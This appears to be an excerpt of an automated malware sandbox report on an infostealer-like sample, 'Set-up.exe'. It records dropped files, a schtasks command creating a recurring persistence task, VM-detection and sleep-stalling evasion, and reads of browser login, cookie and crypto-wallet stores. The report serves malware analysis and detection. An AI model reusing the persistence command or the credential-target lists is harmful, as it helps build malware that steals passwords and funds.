Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C30EAC0 push eax; mov dword ptr [esp], ebx 5_2_6C30EBE3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E4BE1 push eax; mov dword ptr [esp], ebx 5_2_6C2E4BF5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C320460 push eax; mov dword ptr [esp], ebx 5_2_6C3207FF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D0452 push eax; mov dword ptr [esp], ebx 5_2_6C2D048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E8451 push 890005EAh; ret 5_2_6C2E8459
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D04AD push eax; mov dword ptr [esp], ebx 5_2_6C2D048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D64A3 push edx; mov dword ptr [esp], ebx 5_2_6C2D64B7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D04BE push eax; mov dword ptr [esp], ebx 5_2_6C2D048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2DA527 push eax; mov dword ptr [esp], ebx 5_2_6C2DA53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2B1AAA push eax; mov dword ptr [esp], ebx 5_2_6C366622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2B1AAA push eax; mov dword ptr [esp], ebx 5_2_6C366622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2DA6F7 push eax; mov dword ptr [esp], ebx 5_2_6C2DA70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2B6003 push eax; mov dword ptr [esp], ebx 5_2_6C366AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2B6003 push edx; mov dword ptr [esp], edi 5_2_6C366B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2B6098 push eax; mov dword ptr [esp], ebx 5_2_6C366622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2E40D5 push ecx; mov dword ptr [esp], ebx 5_2_6C2E40E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D81E5 push edx; mov dword ptr [esp], ebx 5_2_6C2D81F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C2D023B push eax; mov dword ptr [esp], ebx 5_2_6C2D0251
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\WomwWuRzvwrFDpojKxBm.dll Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 785 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\Set-up.exe TID: 7556 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7960 Thread sleep count: 785 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7960 Thread sleep time: -78500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: Set-up.exe Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696503903o
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: Set-up.exe, 00000000.00000002.2053608610.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549539364.00000000017EC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2053608610.00000000017AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: Set-up.exe Binary or memory string: !d->m_output_flush_remainingd->m_pOutput_buf < d->m_pOutput_buf_endmax_match_len <= TDEFL_MAX_MATCH_LEN(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)d->m_lookahead_size >= len_to_moveScreenPalEpsonMcAfeeVALORANTtokendaoMultiBitHDbackupMinecraft Education EditionDaumMPC-BEVS Revo GrouppluginspypaCreativeThinkBuzanVMwareFree_PDF_SolutionsLenovoServiceBridgeNVIDIA CorporationNVIDIAMetroNichromeMegaDownloaderOISdictionariesuser_dataWindows MediaOneAuthTypeScriptODISVisualStudio ServicesVSApplicationInsightsVSCommonLogishrdNitroNCH SoftwareTempServiceHubAndroidbalena-etchermetaphantomstorage...Wind
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696503903s
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696503903j
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696503903f
Source: Set-up.exe, 00000000.00000003.1592242343.000000000DA4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_008F8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 5_2_008F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_008F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_008F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_008F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 5_2_008F13C9
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C318280 cpuid 5_2_6C318280
Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 5.2.service123.exe.6c290000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2036432764.00000000043CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 7956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR
Source: Set-up.exe String found in binary or memory: \Electrum\wallets
Source: Set-up.exe String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.2053175297.0000000000F57000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: yFiveMWaves AudioISL Online CacheMega LimitedLogiShrdMEGAsyncupdatesSpotifyOperaOpera CryptodatabasesEthereum (UTC)\waves-clientOpera Software\Opera GX Stable\Exodus Eden\JaxxOpera Software\Opera Stable\bitboxOpera Software\Opera Developer\com.liberty.jaxxAuthy Desktop\Local Storage\leveldbOpera Software\Opera Nextatomic\Local Storage\leveldbOpera Software\Opera Crypto Stable\Ledger Live\@trezor\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)\exodus.walletWindows Photo ViewerABBYYAMSDKmsedge.exebrave.exechrome.exe360ChromeX.exeslimjet.execatsxp.exeopera.exeCCleanerBrowser.exebrowser.exeAvastBrowser.exedragon.exeAVGBrowser.exevivaldi.exeSavespkgsOEMsrcjvmsPanasonicjava) (Version: )
Source: Set-up.exe String found in binary or memory: \Jaxx
Source: Set-up.exe String found in binary or memory: \Exodus\backup
Source: Set-up.exe String found in binary or memory: \Exodus Eden
Source: Set-up.exe String found in binary or memory: Ethereum (UTC)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7444, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs